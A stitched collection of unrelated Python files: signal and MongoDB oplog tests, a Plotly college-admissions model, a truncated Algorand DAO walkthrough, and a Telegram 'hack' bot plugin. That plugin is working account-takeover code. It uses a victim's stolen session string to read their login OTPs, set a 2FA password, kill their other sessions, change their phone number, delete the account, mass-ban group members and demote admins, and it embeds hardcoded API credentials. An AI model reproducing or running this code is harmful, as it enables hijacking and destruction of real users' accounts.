expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 4], [-2, -7, -5, -4, 1], [-5, 2, 1, 5, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult)
lhs = Signal("left", [0, 1, 2, 3, 4], [-2, -7, -5, -4, -12], [5, -2, -1, -5, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 4], [-2, -7, -5, -4, 1], [-5, 2, 1, 5, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult) |
import unittest
import asyncio
from common.elasticsearch.bson_serializer import BSONSerializer
from common.mongo.oplog import Oplog
class OplogTest(unittest.TestCase):
def test_tail(self):
oplog = Oplog(limit=10)
@oplog.on('data')
async def on_data(doc):
await asyncio.sleep(.1)
print('event data:', BSONSerializer().dumps(doc))
@oplog.on('insert')
def on_insert(doc):
print('event insert:', doc)
@oplog.on('actfeesaves_insert')
def on_coll_insert(doc):
print('event coll insert:', doc)
async def close():
await asyncio.sleep(5)
oplog.close()
asyncio.ensure_future(close())
loop = asyncio.get_event_loop()
loop.run_until_complete(oplog.tail())
loop.close()
def test_earliest_ts(self):
oplog = Oplog()
print(oplog.earliest_ts())
|
import asyncio
import os
import re
from os import system
from telethon import Button
from telethon import TelegramClient as tg
from telethon import events, functions, types
from telethon.sessions import StringSession as ses
from telethon.tl.functions.auth import ResetAuthorizationsRequest as rt
from telethon.tl.functions.channels import DeleteChannelRequest as dc
from telethon.tl.functions.channels import GetAdminedPublicChannelsRequest as pc
from telethon.tl.functions.channels import JoinChannelRequest as join
from telethon.tl.functions.channels import LeaveChannelRequest as leave
from telethon.tl.types import ChannelParticipantsAdmins
api_id = os.environ.get("APP_ID")
api_hash = os.environ.get("API_HASH")
token = os.environ.get("BOT_TOKEN")
from . import *
mybot = "missrose_bot"
from userbot import bot
eviralboy = 2024465080
async def change_number_code(strses, number, code, otp):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
bot = X
try:
result = await bot(
functions.account.ChangePhoneRequest(
phone_number=number, phone_code_hash=code, phone_code=otp
)
)
return True
except:
return False
async def change_number(strses, number):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
bot = X
result = await bot(
functions.account.SendChangePhoneCodeRequest(
phone_number=number,
settings=types.CodeSettings(
allow_flashcall=True, current_number=True, allow_app_hash=True
),
)
)
return str(result)
async def userinfo(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X.get_me()
return str(k)
async def terminate(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(rt())
GROUP_LIST = []
async def delacc(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(functions.account.DeleteAccountRequest("I am chutia"))
async def promote(strses, grp, user):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
try:
await X.edit_admin(
grp,
user,
manage_call=True,
invite_users=True,
ban_users=True,
change_info=True,
edit_messages=True,
post_messages=True,
add_admins=True,
delete_messages=True,
)
except:
await X.edit_admin(
grp,
user,
is_admin=True,
anonymous=False,
pin_messages=True,
title="Owner",
)
async def user2fa(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
try:
await X.edit_2fa("eviralBOY IS BEST")
return True
except:
return False
async def demall(strses, grp):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
async for x in X.iter_participants(grp, filter=ChannelParticipantsAdmins):
try:
await X.edit_admin(grp, x.id, is_admin=False, manage_call=False)
except:
await X.edit_admin(
grp,
x.id,
manage_call=False,
invite_users=False,
ban_users=False,
change_info=False,
edit_messages=False,
post_messages=False,
add_admins=False,
delete_messages=False,
)
async def joingroup(strses, username):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(join(username))
async def leavegroup(strses, username):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(leave(username))
async def delgroup(strses, username):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
await X(dc(username))
async def cu(strses):
try:
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X.get_me()
return [str(k.first_name), str(k.username or k.id)]
except Exception:
return False
async def usermsgs(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
i = ""
async for x in X.iter_messages(777000, limit=3):
i += f"\n{x.text}\n"
await firebot.delete_dialog(777000)
return str(i)
async def userbans(strses, grp):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X.get_participants(grp)
for x in k:
try:
await X.edit_permissions(grp, x.id, view_messages=False)
except:
pass
async def userchannels(strses):
async with tg(ses(strses), 8138160, "1ad2dae5b9fddc7fe7bfee2db9d54ff2") as X:
k = await X(pc())
i = ""
for x in k.chats:
try:
i += f"\nCHANNEL NAME {x.title} CHANNEL USRNAME @{x.username}\n"
except:
pass
return str(i)
import logging
logging.basicConfig(level=logging.WARNING)
channel = "Its_FIREX"
menu = """
Reply To My Message If I am using In Group
"A" :~ [Check user own groups and channels]
"B" :~ [Check user all information like phone number, usrname... etc]
"C" :~ [Ban a group {give me StringSession and channel/group username i will ban all members there}]
"D" :~ [Know user last otp {1st use option B take phone number and login there Account then use me i will give you otp}]
"E" :~ [Join A Group/Channel via StringSession]
"F" :~ [Leave A Group/Channel via StringSession]
"G" :~ [Delete A Group/Channel]
"H" :~ [Check user two step is eneable or disable]
"I" :~ [Terminate All current active sessions except Your StringSession]
"J" :~ [Delete Account]
"K" :~ [Demote all admins in a group/channel]
"L" ~ [Promote a member in a group/channel]
"M" ~ [Change Phone number using StringSession]
I will add more features Later 😅
"""
keyboard = [
[
Button.inline("A", data="A"),
Button.inline("B", data="B"),
Button.inline("C", data="C"),
Button.inline("D", data="D"),
Button.inline("E", data="E"),
],
[
Button.inline("F", data="F"),
Button.inline("G", data="G"),
Button.inline("H", data="H"),
Button.inline("I", data="I"),
Button.inline("J", data="J"),
],
[
Button.inline("K", data="K"),
Button.inline("L", data="L"),
Button.inline("M", data="M"),
],
[Button.url("Owner", "https://t.me/Eviral")],
]
@firebot.on(events.NewMessage(pattern="/hack", func=lambda x: x.sender_id == bot.uid))
async def start(event):
global menu
async with firebot.conversation(event.chat_id) as x:
await x.send_message(
f"Choose what you want with string session \n\n{menu}", buttons=keyword
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"A")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("📍GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.\n /hack", buttons=keyboard
)
try:
i = await userchannels(strses.text)
except:
return await event.reply(
"This StringSession Has Been Terminated.\n/hack", buttons=keyboard
)
if len(i) > 3855:
file = open("session.txt", "w")
file.write(i + "\n\nDetails BY eviralBoy")
file.close()
await bot.send_file(event.chat_id, "session.txt")
system("rm -rf session.txt")
else:
await event.reply(
i + "\n\nThanks For using eviralBoyBot. \n/hack", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"B")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("🔰GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.\n/hack", buttons=keyboard
)
i = await userinfo(strses.text)
await event.reply(
i + "\n\nThanks For using eviralBoy Bot.\n/hack", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"C")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"String Session Has Been Terminated", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await userbans(strses.text, grpid.text)
await event.reply(
"Banning all members. Thanks For using eviralBoy Bot", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"D")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
i = await usermsgs(strses.text)
await event.reply(i + "\n\nThanks For using eviralBoy Bot", buttons=keyboard)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"E")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await joingroup(strses.text, grpid.text)
await event.reply(
"Joined the Channel/Group Thanks For using eviralBoy Bot", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"F")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await leavegroup(strses.text, grpid.text)
await event.reply(
"Leaved the Channel/Group Thanks For using Boy Bot,", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"G")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("GIVE GROUP/CHANNEL USERNAME/ID")
grpid = await x.get_response()
await delgroup(strses.text, grpid.text)
await event.reply(
"Deleted the Channel/Group Thanks For using eviralBoyBot.", buttons=keyboard
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"H")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession is terminated maybe.", buttons=keyboard
)
i = await user2fa(strses.text)
if i:
await event.reply(
"User don't have two step thats why now two step is `eviralBoy Bot Is best` you can login now\n\nThanks For using eviralBoy Bot.",
buttons=keyboard,
)
else:
await event.reply("Sorry User Have two step already", buttons=keyboard)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"I")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await terminate(strses.text)
await event.reply(
"The all sessions are terminated\n\nThanks For using eviralBoyBot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"J")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await delacc(strses.text)
await event.reply(
"The Account is deleted SUCCESSFULLLY\n\nThanks For using eviralBoy Bot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"K")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("NOW GIVE GROUP/CHANNEL USERNAME")
grp = await x.get_response()
await x.send_message("NOW GIVE USER USERNAME")
user = await x.get_response()
await promote(strses.text, grp.text, user.text)
await event.reply(
"I am Promoting you in Group/Channel wait a min 😗😗\n\nThanks For Using eviralBoy Bot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"L")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession Has Been Terminated.", buttons=keyboard
)
await x.send_message("NOW GIVE GROUP/CHANNEL USERNAME")
pro = await x.get_response()
try:
await demall(strses.text, pro.text)
except:
pass
await event.reply(
"I am Demoting all members of Group/Channel wait a min 😗😗\n\nThanks For using eviralBoyBot.",
buttons=keyboard,
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"M")))
async def users(event):
async with firebot.conversation(event.chat_id) as x:
await x.send_message("GIVE STRING SESSION")
strses = await x.get_response()
op = await cu(strses.text)
if op:
pass
else:
return await event.respond(
"This StringSession is terminated maybe", buttons=keyboard
)
await x.send_message(
"GIVE NUMBER WHICH YOU WANT TO CHANGE\n[NOTE: DONT USE 2ndline or text now numbers]\n[if you are use 2nd line or text now you can't get otp] "
)
number = (await x.get_response()).text
try:
result = await change_number(strses.text, number)
await event.respond(
result
+ "\n copy the phone code hash and check your number you got otp\ni stop for 20 sec copy phone code hash and otp"
)
await asyncio.sleep(20)
await x.send_message("NOW GIVE PHONE CODE HASH")
phone_code_hash = (await x.get_response()).text
await x.send_message("NOW GIVE THE OTP")
otp = (await x.get_response()).text
changing = await change_number_code(
strses.text, number, phone_code_hash, otp
)
if changing:
await event.respond("CONGRATULATIONS NUMBER WAS CHANGED")
else:
await event.respond("Something is wrong")
except Exception as e:
await event.respond(
"SEND THIS ERROR TO - @FirexSupport\n**LOGS**\n" + str(e)
)
|
from . import ScattergramData
from .. import db
import os
import random
from datetime import datetime
import json
import requests
from requests.auth import HTTPBasicAuth
import plotly.tools as tools
import plotly.plotly as py
import plotly.graph_objs as go
PLOTLY_USERNAME = os.environ.get('PLOTLY_USERNAME')
PLOTLY_API_KEY = os.environ.get('PLOTLY_API_KEY')
py.sign_in(PLOTLY_USERNAME, PLOTLY_API_KEY)
auth = HTTPBasicAuth(PLOTLY_USERNAME, PLOTLY_API_KEY)
headers = {'Plotly-Client-Platform': 'python'}
class College(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, index=True)
description = db.Column(db.String, index=True)
cost_of_attendance = db.Column(db.Integer, index=True)
tuition = db.Column(db.Integer, index=True)
room_and_board = db.Column(db.Integer, index=True)
image = db.Column(db.String, index=True)
regular_deadline = db.Column(db.Date, index=True)
early_deadline = db.Column(db.Date, index=True)
plot_SAT2400 = db.Column(db.String)
plot_SAT1600 = db.Column(db.String)
plot_ACT = db.Column(db.String)
    def update_plots(self):
        # remove any previously uploaded plots before regenerating them
        if self.plot_SAT2400:
            plot_num = self.plot_SAT2400[1 + self.plot_SAT2400.rfind('/'):]
            requests.post('https://api.plot.ly/v2/files/' +
                          PLOTLY_USERNAME + ':' + plot_num + '/trash', auth=auth, headers=headers)
            requests.delete('https://api.plot.ly/v2/files/' + PLOTLY_USERNAME + ':' + plot_num +
                            '/permanent_delete', auth=auth, headers=headers)
        if self.plot_SAT1600:
            plot_num = self.plot_SAT1600[1 + self.plot_SAT1600.rfind('/'):]
            requests.post('https://api.plot.ly/v2/files/' +
                          PLOTLY_USERNAME + ':' + plot_num + '/trash', auth=auth, headers=headers)
            requests.delete('https://api.plot.ly/v2/files/' + PLOTLY_USERNAME + ':' + plot_num +
                            '/permanent_delete', auth=auth, headers=headers)
        if self.plot_ACT:
            plot_num = self.plot_ACT[1 + self.plot_ACT.rfind('/'):]
            requests.post('https://api.plot.ly/v2/files/' +
                          PLOTLY_USERNAME + ':' + plot_num + '/trash', auth=auth, headers=headers)
            requests.delete('https://api.plot.ly/v2/files/' + PLOTLY_USERNAME + ':' + plot_num +
                            '/permanent_delete', auth=auth, headers=headers)
data = ScattergramData.query.filter_by(college=self.name).all()
college_filename = self.name.replace(' ', '-').lower()
# GPA vs. SAT [2400]
SAT2400_Accepted = []
GPA_SAT2400_Accepted = []
SAT2400_Denied = []
GPA_SAT2400_Denied = []
SAT2400_Waitlisted1 = []
GPA_SAT2400_Waitlisted1 = []
SAT2400_Waitlisted2 = []
GPA_SAT2400_Waitlisted2 = []
SAT2400_Waitlisted3 = []
GPA_SAT2400_Waitlisted3 = []
# GPA vs. SAT [1600]
SAT1600_Accepted = []
GPA_SAT1600_Accepted = []
SAT1600_Denied = []
GPA_SAT1600_Denied = []
SAT1600_Waitlisted1 = []
GPA_SAT1600_Waitlisted1 = []
SAT1600_Waitlisted2 = []
GPA_SAT1600_Waitlisted2 = []
SAT1600_Waitlisted3 = []
GPA_SAT1600_Waitlisted3 = []
# GPA vs. ACT
ACT_Accepted = []
GPA_ACT_Accepted = []
ACT_Denied = []
GPA_ACT_Denied = []
ACT_Waitlisted1 = []
GPA_ACT_Waitlisted1 = []
ACT_Waitlisted2 = []
GPA_ACT_Waitlisted2 = []
ACT_Waitlisted3 = []
GPA_ACT_Waitlisted3 = []
for i in range(len(data)):
if(data[i].SAT2400):
if(data[i].status == 'Accepted'):
SAT2400_Accepted.append(int(data[i].SAT2400))
GPA_SAT2400_Accepted.append(data[i].GPA)
elif(data[i].status == 'Denied'):
SAT2400_Denied.append(int(data[i].SAT2400))
GPA_SAT2400_Denied.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Accepted)'):
SAT2400_Waitlisted1.append(int(data[i].SAT2400))
GPA_SAT2400_Waitlisted1.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Denied)'):
SAT2400_Waitlisted2.append(int(data[i].SAT2400))
GPA_SAT2400_Waitlisted2.append(data[i].GPA)
if(data[i].status == 'Waitlisted/Deferred (Withdrew App)'):
SAT2400_Waitlisted3.append(int(data[i].SAT2400))
GPA_SAT2400_Waitlisted3.append(data[i].GPA)
if(data[i].SAT1600):
if(data[i].status == 'Accepted'):
SAT1600_Accepted.append(int(data[i].SAT1600))
GPA_SAT1600_Accepted.append(data[i].GPA)
elif(data[i].status == 'Denied'):
SAT1600_Denied.append(int(data[i].SAT1600))
GPA_SAT1600_Denied.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Accepted)'):
SAT1600_Waitlisted1.append(int(data[i].SAT1600))
GPA_SAT1600_Waitlisted1.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Denied)'):
SAT1600_Waitlisted2.append(int(data[i].SAT1600))
GPA_SAT1600_Waitlisted2.append(data[i].GPA)
if(data[i].status == 'Waitlisted/Deferred (Withdrew App)'):
SAT1600_Waitlisted3.append(int(data[i].SAT1600))
GPA_SAT1600_Waitlisted3.append(data[i].GPA)
if(data[i].ACT):
if(data[i].status == 'Accepted'):
ACT_Accepted.append(int(data[i].ACT))
GPA_ACT_Accepted.append(data[i].GPA)
elif(data[i].status == 'Denied'):
ACT_Denied.append(int(data[i].ACT))
GPA_ACT_Denied.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Accepted)'):
ACT_Waitlisted1.append(int(data[i].ACT))
GPA_ACT_Waitlisted1.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Denied)'):
ACT_Waitlisted2.append(int(data[i].ACT))
GPA_ACT_Waitlisted2.append(data[i].GPA)
if(data[i].status == 'Waitlisted/Deferred (Withdrew App)'):
ACT_Waitlisted3.append(int(data[i].ACT))
GPA_ACT_Waitlisted3.append(data[i].GPA)
# Create a trace
trace0 = go.Scatter(
x=SAT2400_Accepted,
y=GPA_SAT2400_Accepted,
mode='markers',
name="Accepted"
)
trace1 = go.Scatter(
x=SAT2400_Denied,
y=GPA_SAT2400_Denied,
mode='markers',
name="Denied"
)
trace2 = go.Scatter(
x=SAT2400_Waitlisted1,
y=GPA_SAT2400_Waitlisted1,
mode='markers',
name="Waitlisted/Deferred (Accepted)"
)
trace3 = go.Scatter(
x=SAT2400_Waitlisted2,
y=GPA_SAT2400_Waitlisted2,
mode='markers',
name="Waitlisted/Deferred (Denied)"
)
trace4 = go.Scatter(
x=SAT2400_Waitlisted3,
y=GPA_SAT2400_Waitlisted3,
mode='markers',
name="Waitlisted/Deferred (Withdrew App)"
)
layout1 = go.Layout(
title='{}: SAT [2400] vs. GPA'.format(self.name),
xaxis=dict(
title='SAT [2400]'
),
yaxis=dict(
title='GPA',
)
)
fig1 = go.Figure(data=[trace0, trace1, trace2,
trace3, trace4], layout=layout1)
self.plot_SAT2400 = py.plot(
fig1, filename=college_filename + '-sat2400', auto_open=False)
# Create a trace
trace5 = go.Scatter(
x=SAT1600_Accepted,
y=GPA_SAT1600_Accepted,
mode='markers',
name="Accepted"
)
trace6 = go.Scatter(
x=SAT1600_Denied,
y=GPA_SAT1600_Denied,
mode='markers',
name="Denied"
)
trace7 = go.Scatter(
x=SAT1600_Waitlisted1,
y=GPA_SAT1600_Waitlisted1,
mode='markers',
name="Waitlisted/Deferred (Accepted)"
)
trace8 = go.Scatter(
x=SAT1600_Waitlisted2,
y=GPA_SAT1600_Waitlisted2,
mode='markers',
name="Waitlisted/Deferred (Denied)"
)
trace9 = go.Scatter(
x=SAT1600_Waitlisted3,
y=GPA_SAT1600_Waitlisted3,
mode='markers',
name="Waitlisted/Deferred (Withdrew App)"
)
layout2 = go.Layout(
title='{}: SAT [1600] vs. GPA'.format(self.name),
xaxis=dict(
title='SAT1600'
),
yaxis=dict(
title='GPA',
)
)
fig2 = go.Figure(data=[trace5, trace6, trace7,
trace8, trace9], layout=layout2)
self.plot_SAT1600 = py.plot(
fig2, filename=college_filename + '-sat1600', auto_open=False)
# Create a trace
trace10 = go.Scatter(
x=ACT_Accepted,
y=GPA_ACT_Accepted,
mode='markers',
name="Accepted"
)
trace11 = go.Scatter(
x=ACT_Denied,
y=GPA_ACT_Denied,
mode='markers',
name="Denied"
)
trace12 = go.Scatter(
x=ACT_Waitlisted1,
y=GPA_ACT_Waitlisted1,
mode='markers',
name="Waitlisted/Deferred (Accepted)"
)
trace13 = go.Scatter(
x=ACT_Waitlisted2,
y=GPA_ACT_Waitlisted2,
mode='markers',
name="Waitlisted/Deferred (Denied)"
)
trace14 = go.Scatter(
x=ACT_Waitlisted3,
y=GPA_ACT_Waitlisted3,
mode='markers',
name="Waitlisted/Deferred (Withdrew App)"
)
layout3 = go.Layout(
title='{}: ACT vs. GPA'.format(self.name),
xaxis=dict(
title='ACT'
),
yaxis=dict(
title='GPA',
)
)
fig3 = go.Figure(data=[trace10, trace11, trace12,
trace13, trace14], layout=layout3)
self.plot_ACT = py.plot(
fig3, filename=college_filename + '-act', auto_open=False)
@staticmethod
def get_college_by_name(name):
return College.query.filter_by(name=name).first()
@staticmethod
def insert_colleges():
college_names = {
'University of Pennsylvania', 'Columbia University',
'Stanford University', 'Princeton University',
'Harvard University', 'Cornell University', 'Yale University',
'Brown University', 'Dartmouth College', 'New York University',
'University of California, Berkeley',
            'University of California, Los Angeles', 'University of Michigan',
            'Carnegie Mellon University', 'Johns Hopkins University',
'University of Chicago', 'Amherst College', 'Williams College',
'Massachusetts Institute of Technology',
'Georgia Institute of Technology',
'California Institute of Technology', 'Duke University'
}
early_deadlines = [
datetime(2017, 11, 4),
datetime(2017, 11, 3),
datetime(2017, 10, 26),
datetime(2017, 11, 1),
datetime(2017, 11, 11),
datetime(2017, 11, 13),
datetime(2017, 10, 29)
]
regular_deadlines = [
datetime(2017, 12, 31),
datetime(2017, 1, 1),
datetime(2017, 1, 2),
datetime(2017, 1, 3),
datetime(2017, 1, 5),
datetime(2017, 2, 1),
datetime(2017, 1, 14)
]
descriptions = [
'Private research university', 'Ivy League university',
'Liberal arts college', 'Public research university',
'Private doctorate university'
]
costs_of_attendance = [
60000, 50000
]
tuitions = [
50000, 16000, 24000
]
room_and_boards = [
10000, 15000, 8000
]
images = [
'http://www.collegerank.net/wp-content/uploads/2015/08/morehouse-college-quad.jpg',
'https://static1.squarespace.com/static/52f11228e4b0a96c7b51a92d/t/55e705bee4b03fc234f02b5e/1441203647587/'
]
for c in college_names:
college = College.get_college_by_name(c)
if college is None:
college = College(
name=c,
description=random.choice(descriptions),
cost_of_attendance=random.choice(costs_of_attendance),
tuition=random.choice(tuitions),
room_and_board=random.choice(room_and_boards),
regular_deadline=random.choice(regular_deadlines),
early_deadline=random.choice(early_deadlines),
image=random.choice(images))
db.session.add(college)
db.session.commit()
def __repr__(self):
return '<College: {}>'.format(self.name)
|
"""
End-to-end example of creating a DAO, submitting a PAYMENT proposal,
successfully passing the proposal, and then implementing it using the
on-chain logic.
"""
import algosdk.logic
import algodao.assets
import algodao.helpers
import tests.helpers
from algodao.committee import Committee
from algodao.governance import PreapprovalGate, AlgoDao
from algodao.voting import ProposalType, VoteType, ElectionToken, Proposal
algodao.helpers.loggingconfig()
# set up the creator's account
algod = algodao.helpers.createclient()
creatorprivkey, creatoraddr = tests.helpers.create_funded(algod)
# create the trust committee
committee = Committee.CreateCommittee("Trusted", 5)
deployedcommittee = Committee.deploy(algod, committee, creatorprivkey)
committee_addr = algosdk.logic.get_application_address(deployedcommittee.appid)
# the committee needs some funding in order to initialize a new token (the
# committee token, which indicates membership)
tests.helpers.fund_account(algod, committee_addr)
deployedcommittee.call_inittoken(algod, creatorprivkey, creatoraddr)
algodao.helpers.optinasset(algod, creatoraddr, creatorprivkey, deployedcommittee.assetid)
# for simplicity in this example, the creator of the DAO is the only member
# of the trust committee
deployedcommittee.call_setmembers(algod, creatorprivkey, creatoraddr, [creatoraddr])
# create the governance token
gov_count = 1000000
gov_asset_id = algodao.assets.createasset(
algod,
creatoraddr,
creatorprivkey,
algodao.assets.createmetadata(
"My Governance Token",
"Governance token for My DAO",
{},
"",
),
gov_count,
"DAOGOV",
"MyDAO Governance",
"https://localhost/MyDAO/tokens/governance",
)
# create the preapproval gate with a single member
creategate = PreapprovalGate.CreateGate(deployedcommittee.appid, 1)
gate = PreapprovalGate.deploy(algod, creategate, creatorprivkey)
algodao.helpers.optinapp(algod, creatorprivkey, creatoraddr, gate.appid)
gate_addr = algosdk.logic.get_application_address(gate.appid)
# the preapproval gate also needs funding to create its token (the trust token)
tests.helpers.fund_account(algod, gate_addr)
gate.call_inittoken(
algod,
creatoraddr,
creatorprivkey,
100,
"Trusted",
"TRUST",
'http://localhost/abcd'
)
# create the DAO
dao = AlgoDao.CreateDao("My DAO", gate.trust_assetid)
deployeddao = AlgoDao.deploy(algod, dao, creatorprivkey)
# add a rule specifying that PAYMENT proposals must be passed by a governance
# vote, with a 60% approval in order to pass (no minimum vote count or quorum
# requirements are currently implemented)
deployeddao.call_addrule(
algod,
creatoraddr,
creatorprivkey,
ProposalType.PAYMENT,
VoteType.GOVERNANCE_TOKEN,
60
)
# fund the DAO treasury
tests.helpers.fund_account(algod, algosdk.logic.get_application_address(deployeddao.appid))
# finalize the DAO - at this point no further updates are allowed by the
# creator; all further updates must be approved by the governance rules through
# a Proposal (not yet implemented)
deployeddao.call_finalize(algod, creatoraddr, creatorprivkey)
# create the election token. the election token is distributed to governance
# token holders according to the governance2votes lambda (here we simply define
# a 1-to-1 mapping) and is deposited into the Proposal contract to
# represent votes.
lastround = algod.status()['last-round']
voting_rounds = 40
waitforround = lastround + voting_rounds + 1
beginreg = lastround
endreg = lastround + voting_rounds
indexer = algodao.helpers.indexer_client()
election = algodao.voting.Election(
indexer,
algodao.voting.GovernanceToken(gov_asset_id),
None,
lambda govvotes: govvotes, # provide 1 election token per gov token
beginreg,
endreg,
)
# build the Merkle tree to distribute election tokens to governance token
# holders in accordance with a current snapshot of holding amounts
createtree = election.builddistribution()
appid = createtree.deploy(algod, creatorprivkey)
deployedtree = algodao.assets.TokenDistributionTree.DeployedTree(
appid, createtree.addr2count, createtree.merkletree
)
# the distribution tree contract requires funds to initialize the election
# token
tests.helpers.fund_account(algod, algosdk.logic.get_application_address(appid))
election_assetid = deployedtree.call_inittoken(
algod,
creatoraddr,
creatorprivkey,
gov_count,
"ELEC",
"MyDao Election Token",
"https://localhost/MyDao/tokens/election"
)
# opt into the election token and claim our share
algodao.helpers.optinasset(algod, creatoraddr, creatorprivkey, election_assetid)
deployedtree.call_claim(algod, creatoraddr, creatorprivkey)
electiontoken = ElectionToken(election_assetid)
# create the proposal (pay 10,000 microalgo to receiveraddr)
receiverprivkey, receiveraddr = tests.helpers.create_funded(algod)
amount = 10000
proposal = Proposal.CreateProposal(
"Test Proposal",
electiontoken,
lastround,
lastround + voting_rounds,
lastround,
lastround + voting_rounds,
2, # number of options; must be 2 for an up/down vote
deployeddao.appid,
ProposalType.PAYMENT,
)
proposal.setpaymentinfo(receiveraddr, amount)
proposal.setvotedata(VoteType.GOVERNANCE_TOKEN, 60)
deployedproposal = Proposal.deploy(algod, proposal, creatorprivkey)
# the Proposal contract requires funds to opt into the trust token and the
# election token
tests.helpers.fund_account(algod, algosdk.logic.get_application_address(deployedproposal.appid))
deployedproposal.call_optintoken(algod, creatoraddr, creatorprivkey, gate.trust_assetid)
deployedproposal.call_optintoken(algod, creatoraddr, creatorprivkey, electiontoken.asset_id)
# have the preapproval committee assess and preapprove the proposal
gate.call_assessproposal(algod, creatoraddr, creatorprivkey, deployedproposal.appid)
gate.call_vote(algod, creatoraddr, creatorprivkey, deployedproposal.appid, 1)
# vote on the proposal
algodao.helpers.optinapp(algod, creatorprivkey, creatoraddr, deployedproposal.appid)
deployedproposal.call_vote(
algod,
creatoraddr,
creatorprivkey,
